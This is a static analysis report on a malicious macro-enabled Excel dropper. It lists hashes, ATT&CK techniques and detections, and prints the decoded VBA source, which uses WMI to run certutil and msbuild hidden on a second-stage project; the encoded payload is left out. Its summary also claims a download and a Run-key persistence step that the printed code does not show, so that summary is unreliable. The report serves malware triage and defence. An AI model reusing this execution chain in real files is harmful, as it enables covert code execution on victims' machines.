Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 3520b11fd465353a…

MALICIOUS

Office (OOXML)

Size: 679.9 KB
Created: 2018-06-12 16:48:25 UTC
Authoring application: Microsoft Excel 15.0300
First seen: 2019-11-20
MD5: 0156a98870033b37d1a6eb40390e1b73
SHA-1: d62a9c3e17e75a64f9692b7a7dad1fd78b1c4383
SHA-256: 3520b11fd465353a56e9fbbe33245a1699ffb95833d156b22984abbaaa512d8c
Risk score: 406

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1218.005 System Binary Proxy Execution: Msbuild
  • T1140 Deobfuscate/Decode Files or Information
  • T1218.009 System Binary Proxy Execution: Regsvr32

The sample is a macro-enabled Excel document containing Auto_Open and Workbook_Open macros, indicating immediate execution upon opening. The VBA script utilizes `CreateObject` and `GetObject` to launch `certutil.exe` and `msbuild.exe` for downloading and executing a second-stage payload from a constructed XML file. It also attempts to establish persistence by creating a Run key entry named 'OfficeUpdate'. The script's obfuscation and use of legitimate system binaries to download and execute further code are characteristic of a dropper.

Heuristics (11)

  • ClamAV: Doc.Dropper.Agent-7080481-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-7080481-0
  • VBA project inside OOXML medium 8 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
    Matched line in script
        cu = "certutil"
        ex = "exe"
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
    Matched line in script
    Public Function GEeROixMEn() As Variant
        Set fs = CreateObject("Scripting.FileSystemObject")
        Set TmpFolder = fs.GetSpecialFolder(2)
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Public Function GEeROixMEn() As Variant
        Set fs = CreateObject("Scripting.FileSystemObject")
        Set TmpFolder = fs.GetSpecialFolder(2)
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
        Set ObjWS = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
        Set objS = ObjWS.Get("Win32_ProcessStartup")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Private Sub Workbook_Open()
        Auto_Open
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
        Dim exdate As Date
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    Sub ArmySafe()
        strDomain = Environ("USERDOMAIN")
        arrDomains = Split("NASW,nasw,NANW,nanw,NAE,nae,NASE,nase,NG,ng,MI,mi,AMED,amed,RSNI,rsni,MHS,mhs,QUIROZ1,quiroz1,PENTEST-01,pentest-01", ",")
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 15634 bytes
SHA-256: e90b2c4b7b2d5152ca40d53e0c2262e170e7d3ac8914f71aa2f0685411228e5a
Detection: ClamAV: No threats found
Obfuscation or payload: likely
119 of 188 identifiers look randomly generated (e.g. 'eVJlYWQ9MHgwMDAwMDAxMCxWaXJ0dWFsTWVtb3J5') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Dim fs As Object
Dim TmpFolder As Object
Dim env
Dim cu
Dim ecu As String
Dim emsb As String
Dim ex
Dim msb
Dim officeDir As String
Dim msbPath As String
Dim TmpFile
Dim windir
Dim wmsb As Object
Dim strLocation As String

Sub Auto_Open()
    Dim exdate As Date
    exdate = "06/22/2018"
    If Date < exdate Then
        ArmySafe
    End If
End Sub

Sub ArmySafe()
    strDomain = Environ("USERDOMAIN")
    arrDomains = Split("NASW,nasw,NANW,nanw,NAE,nae,NASE,nase,NG,ng,MI,mi,AMED,amed,RSNI,rsni,MHS,mhs,QUIROZ1,quiroz1,PENTEST-01,pentest-01", ",")
    If (UBound(Filter(arrDomains, strDomain)) > -1) = True Then
        Call GoPwn
    End If
End Sub

Sub GoPwn()
    Call GEeROixMEn
End Sub

Public Function GEeROixMEn() As Variant
    Set fs = CreateObject("Scripting.FileSystemObject")
    Set TmpFolder = fs.GetSpecialFolder(2)

    cu = "certutil"
    ex = "exe"
    msb = "msbuild"
    env = CStr(Environ("USERPROFILE"))
    windir = CStr(Environ("WINDIR"))
    officeDir = env & "\AppData\Local\Microsoft\Office\"
    msbPath = windir & "\Microsoft.NET\Framework\v4.0.30319\"
    strLocation = officeDir & "\DvNqUT.xml"
    TmpFile = "\suMXUxtQWFQiXZ.txt"

    ' [108 concatenated base64 string lines assigned to dPuOigCljRK omitted here: the encoded MSBuild project XML that the macro writes to disk and decodes with certutil]

    Set wmsb = fs.CreateTextFile(TmpFolder & TmpFile, True)
    wmsb.WriteLine dPuOigCljRK
    wmsb.Close

    Const HIDDEN_WINDOW = 0
    strComputer = "."

    ecu = cu & strComputer & ex & " " & "-decode -f" & " " & TmpFolder & TmpFile & " " & strLocation

    Set ObjWS = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
    Set objS = ObjWS.Get("Win32_ProcessStartup")
    Set objC = objS.SpawnInstance_
    objC.ShowWindow = HIDDEN_WINDOW
    Set objP = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
    objP.Create ecu, Null, objC, intProcessID

    emsb = msbPath & msb & strComputer & ex & " " & strLocation

    Set ObjWS = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
    Set objS = ObjWS.Get("Win32_ProcessStartup")
    Set objC = objS.SpawnInstance_
    objC.ShowWindow = HIDDEN_WINDOW
    Set objP = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
    objP.Create emsb, Null, objC, intProcessID
End Function

Sub Macro2()
    ActiveSheet.Shapes.Range(Array("Picture 1")).Select
    Selection.ShapeRange.ZOrder msoSendToBack
    ActiveSheet.Shapes.Range(Array("Picture 3")).Select
    Selection.ShapeRange.ZOrder msoSendToBack
End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
    Auto_Open
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: xl/vbaProject.bin
Size: 39936 bytes
SHA-256: a0e50844b0401f5a67dc00d60459dfcf7308e0acaeca701360e26ffedc153a54
Detection: ClamAV: Doc.Dropper.Agent-7080481-0
Obfuscation or payload: likely
414 of 700 identifiers look randomly generated (e.g. 'ZSApXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0') — consistent with name-mangling obfuscation.